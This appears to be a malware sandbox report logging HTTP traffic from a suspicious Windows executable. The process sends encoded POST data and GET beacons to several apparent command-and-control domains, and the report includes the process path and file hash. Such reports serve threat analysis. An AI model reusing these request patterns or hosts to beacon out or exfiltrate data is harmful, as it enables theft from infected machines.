                                                                      Nov 7, 2024 15:29:01.378372908 CET848INData Raw: 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 09 4d 33 36 30 2e 36 33 33 2c 33 36 33 2e 30 33 39 63 31 2e 33 35 32 2c 31 2e 30 36 31 2c 34 2e 39 31 2c 35 2e 30 35 36 2c 35 2e
                                                                      Data Ascii: stroke-miterlimit="10" d="M360.633,363.039c1.352,1.061,4.91,5.056,5.824,6.634l27.874,47.634c3.855,6.649,1.59,15.164-5.059,19.02l0,0c-6.649,3.855-15.164,1.59-19.02-5.059l-5.603-9.663" /> <path fill="#FFFFFF"
                                                                      Nov 7, 2024 15:29:01.383434057 CET1236INData Raw: 0a 09 09 09 09 4d 33 30 31 2e 33 30 31 2c 33 34 37 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38
                                                                      Data Ascii: M301.301,347.66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.849995199.192.19.19805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:03.230871916 CET758OUTPOST /azuc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.demovix.xyz
                                                                      Origin: http://www.demovix.xyz
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.demovix.xyz/azuc/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 46 47 75 55 66 75 67 39 59 79 56 51 36 72 38 56 52 61 69 78 47 72 49 62 43 71 5a 51 4c 2f 52 6a 43 48 48 49 66 54 48 4f 77 6a 48 4f 56 56 4f 32 53 35 57 35 44 41 6e 4d 44 38 55 59 4c 2b 4f 6b 51 79 32 65 31 59 74 71 63 6e 31 4b 31 6c 71 49 65 49 77 67 31 51 78 2b 30 67 70 43 49 6d 30 41 35 65 56 54 48 43 37 77 6d 38 6f 36 77 69 5a 35 70 69 51 6b 59 72 7a 5a 37 76 45 41 34 74 51 2b 57 6b 77 45 4e 34 34 73 47 64 74 47 36 61 48 74 4c 57 56 6c 77 70 30 55 44 6b 71 4d 69 39 6c 4a 6f 38 46 30 44 34 66 44 44 38 6a 4e 68 57 43 5a 76 33 33 46 37 58 4b 4e 65 67 30 30 31 6b 33 30 36 73 6c 56 52 4c 2f 35 75 6b 2f 32 37 75 6c 34 71 4f 4a 50 4e 61 74 2f 6d 32 67 6d
                                                                      Data Ascii: F2=FGuUfug9YyVQ6r8VRaixGrIbCqZQL/RjCHHIfTHOwjHOVVO2S5W5DAnMD8UYL+OkQy2e1Ytqcn1K1lqIeIwg1Qx+0gpCIm0A5eVTHC7wm8o6wiZ5piQkYrzZ7vEA4tQ+WkwEN44sGdtG6aHtLWVlwp0UDkqMi9lJo8F0D4fDD8jNhWCZv33F7XKNeg001k306slVRL/5uk/27ul4qOJPNat/m2gm
                                                                      Nov 7, 2024 15:29:03.932053089 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 07 Nov 2024 14:29:03 GMT
                                                                      Server: Apache
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Content-Length: 16026
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      19 | 192.168.2.8 | 49996 | 199.192.19.198 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:29:05.778769016 CET | 1775 | OUT | POST /azuc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.demovix.xyz
                                                                      Origin: http://www.demovix.xyz
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.demovix.xyz/azuc/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:29:06.449321032 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 07 Nov 2024 14:29:06 GMT
                                                                      Server: Apache
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Content-Length: 16026
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      20 | 192.168.2.8 | 49997 | 199.192.19.198 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:29:08.320657969 CET | 481 | OUT | GET /azuc/?F2=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRjS9f0ml2OHl666AhHB2VhosEmVxlyD8Sfr3+gvtJ58MzMw==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.demovix.xyz
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:29:09.004515886 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 07 Nov 2024 14:29:08 GMT
                                                                      Server: Apache
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Content-Length: 16026
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      21 | 192.168.2.8 | 49998 | 208.91.197.27 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:29:14.395114899 CET | 759 | OUT | POST /bnrz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.palcoconnector.net
                                                                      Origin: http://www.palcoconnector.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.palcoconnector.net/bnrz/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Ascii: F2=DSZQwtuPtL5jRLoHDpAQLroioxvPhpA9aK4Hj15QQJnQJFw21zJQ3dNbaK2jpW9z6EQ61015jRpXwzq4iNstjPAWmfJGiA+l+3Ky9UGbF+lq/IewkHneZPnA1a7ZxNk18cQBsGNEIEmHvw2U6a7iTN4xrDD1WQ25k412GYzpi1eHMINozPzdEm7wX9RldKa1Er+i9Hs=


                                                                      Session ID: 22 | Source IP: 192.168.2.8 | Source Port: 49999 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 5284 | Process: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp: Nov 7, 2024 15:29:16.931986094 CET | Bytes transferred: 779 | Direction: OUT | Data:
                                                                      POST /bnrz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.palcoconnector.net
                                                                      Origin: http://www.palcoconnector.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.palcoconnector.net/bnrz/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Ascii: F2=DSZQwtuPtL5jSr4HFOUQcbohnRvP0ZA5aK8HjwYNQ6DQJkA203dQ0dNbP62mx2946EcE1wx5jRVXw2W4i/Ei5/AUr/JEsg+l+3Ky9USxF+9q89WwkmndQvnB2a7Z1NkL8cRxsCVuIB6HvxmU6Ov9dN43mjC6Rie0jbp4bqzvsG+lN+gCpt7bHmTbX+5TY9HdeIuSjQ7oU0outHqt93spMW2mzoTV


                                                                      Session ID: 23 | Source IP: 192.168.2.8 | Source Port: 50000 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 5284 | Process: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp: Nov 7, 2024 15:29:19.478890896 CET | Bytes transferred: 1796 | Direction: OUT | Data:
                                                                      POST /bnrz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.palcoconnector.net
                                                                      Origin: http://www.palcoconnector.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.palcoconnector.net/bnrz/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36


                                                                      Session ID: 24 | Source IP: 192.168.2.8 | Source Port: 50001 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 5284 | Process: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp: Nov 7, 2024 15:29:22.023922920 CET | Bytes transferred: 488 | Direction: OUT | Data:
                                                                      GET /bnrz/?F2=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq485u0/vrhbrCPm9Wbu3FX/PMpZ3p2821/Za72d+YrU3sps/g==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.palcoconnector.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Timestamp: Nov 7, 2024 15:29:23.075236082 CET | Bytes transferred: 1236 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Date: Thu, 07 Nov 2024 14:29:22 GMT
                                                                      Server: Apache
                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_K4B1jeAfL0lberQynNRxWl8InwzYqMruPu0iDmZnsmUl2KoyGXZ83tucxKLhMcLq/ypJw5/90ehqILtjVgiKMg==
                                                                      Content-Length: 2630
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_K4B1jeAfL0lberQynNRxWl8InwzYqMruPu0iDmZnsmUl2KoyGXZ83tucxKLhMcLq/ypJw5/90ehqILtjVgiKMg=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.palcoconnector.net/px.js?ch=
                                                                      Timestamp: Nov 7, 2024 15:29:23.075258970 CET | Bytes transferred: 1236 | Direction: IN | Data:
                                                                      Data Raw: 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 63 6f 63 6f 6e 6e 65 63 74 6f 72 2e 6e 65 74 2f 70 78 2e 6a
                                                                      Data Ascii: 1"></script><script type="text/javascript" src="http://www.palcoconnector.net/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0p
                                                                      Timestamp: Nov 7, 2024 15:29:23.075272083 CET | Bytes transferred: 1002 | Direction: IN | Data:
                                                                      Data Raw: 73 22 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c
                                                                      Data Ascii: s"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><scrip


                                                                      Session ID: 25 | Source IP: 192.168.2.8 | Source Port: 50002 | Destination IP: 156.242.132.82 | Destination Port: 80 | PID: 5284 | Process: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp: Nov 7, 2024 15:29:28.585345984 CET | Bytes transferred: 750 | Direction: OUT | Data:
                                                                      POST /b6g5/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.shanhaiguan.net
                                                                      Origin: http://www.shanhaiguan.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.shanhaiguan.net/b6g5/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Ascii: F2=X+4KPV4vjyFN8RrkRipvO6G3BIknWfT66a7xlBaav5CAEjzOyCiv6FdWwe/0l/WO2W3DEHhsvzAy6MFgKzn2vCRrmhfPjcFDxUjAI52iVl23lSxGUu1NhSq9VZjFsjVo/jHAqlVmDYv7L0vfZxmgp5jObgKyV09KjkUEF0UscNq7loH5B1cxGg7ljvhHR660MSR3rjE=


                                                                      Session ID: 26 | Source IP: 192.168.2.8 | Source Port: 50003 | Destination IP: 156.242.132.82 | Destination Port: 80 | PID: 5284 | Process: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp: Nov 7, 2024 15:29:31.204077959 CET | Bytes transferred: 770 | Direction: OUT | Data:
                                                                      POST /b6g5/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.shanhaiguan.net
                                                                      Origin: http://www.shanhaiguan.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.shanhaiguan.net/b6g5/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Ascii: F2=X+4KPV4vjyFN8xbkTBBvfaG0EIknd/T+6a3xlAuwvLmAEDDOg2Wv3ldW4+/94PWR2WrLEHdsvzUy6J5gJEL1tSRppBfNs8FDxUjAI5jJVlu3im1GULBC+iq+SZjFojVs/jHuqllMDej7LxDfagmjn5jIEwLwFm9Frm0aJ1QcQ7iOt+qTbXU3FgTOjsJxUNncWxBH10T/Hen+2JrvfIWBWVfTbTr7


                                                                      Session ID: 27 | Source IP: 192.168.2.8 | Source Port: 50004 | Destination IP: 156.242.132.82 | Destination Port: 80 | PID: 5284 | Process: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp: Nov 7, 2024 15:29:33.862226009 CET | Bytes transferred: 1787 | Direction: OUT | Data:
                                                                      POST /b6g5/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.shanhaiguan.net
                                                                      Origin: http://www.shanhaiguan.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.shanhaiguan.net/b6g5/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36


                                                                      Session ID: 28 | Source IP: 192.168.2.8 | Source Port: 50005 | Destination IP: 156.242.132.82 | Destination Port: 80 | PID: 5284 | Process: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp: Nov 7, 2024 15:29:36.401371002 CET | Bytes transferred: 485 | Direction: OUT | Data:
                                                                      GET /b6g5/?F2=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrS2CJxsBKcruwu6mzHCImmdlnckGZwJuxb62mJXIzJiBU08Q==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.shanhaiguan.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36


                                                                      Session ID: 29 | Source IP: 192.168.2.8 | Source Port: 50006 | Destination IP: 84.32.84.32 | Destination Port: 80 | PID: 5284 | Process: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp: Nov 7, 2024 15:29:58.063930988 CET | Bytes transferred: 747 | Direction: OUT | Data:
                                                                      POST /n2dv/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.es-lidl.online
                                                                      Origin: http://www.es-lidl.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.es-lidl.online/n2dv/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Ascii: F2=WMwPXkgP/5p6WC/KlvuxKM1Jz9QwLGAh25bBQLNZTUkilQ5OJAU213KYP0bxqy7XMR+CdgwyFf0aiJDqyt0mhcLQ/eVBGdOcG6WSpZ+faLhc5XLGpMYWz0vKv9647t3O2BjNn+Mxme/vfDiv7Bmhoad9BvDqeOnoU3tfZazHOpJp2JLCFki92s9gnuT8Rd99eeKsCe4=


                                                                      Session ID: 30 | Source IP: 192.168.2.8 | Source Port: 50007 | Destination IP: 84.32.84.32 | Destination Port: 80
                                                                      Timestamp: Nov 7, 2024 15:30:01.793606043 CET | Bytes transferred: 767 | Direction: OUT | Data:
                                                                      POST /n2dv/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.es-lidl.online
                                                                      Origin: http://www.es-lidl.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.es-lidl.online/n2dv/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Ascii: F2=WMwPXkgP/5p6ESPKjOuxNs1K29QwQWAl25HBQO0CSiUilxJOb10223KYEUbw0C7cMRj3dikyFbkaiJzqzeMhnMLWz+V5btOcG6WSpZ6haL5c5nXGqugR+Uu4/N64wN3C2BjVn9IImcHvfHqv7TOuiac4FvD1ROiwZ293cJnYQoJPz/mofGq71sVLnt7KUqgVE9accJv2hdClgGMS3W1FBnUS6M8f


                                                                      Target ID:0
                                                                      Start time:09:26:54
                                                                      Start date:07/11/2024
                                                                      Path:C:\Users\user\Desktop\xBzBOQwywT.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\xBzBOQwywT.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'332'289 bytes
                                                                      MD5 hash:715EC2A53173921888B38C9731AD9BC9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:09:27:02
                                                                      Start date:07/11/2024
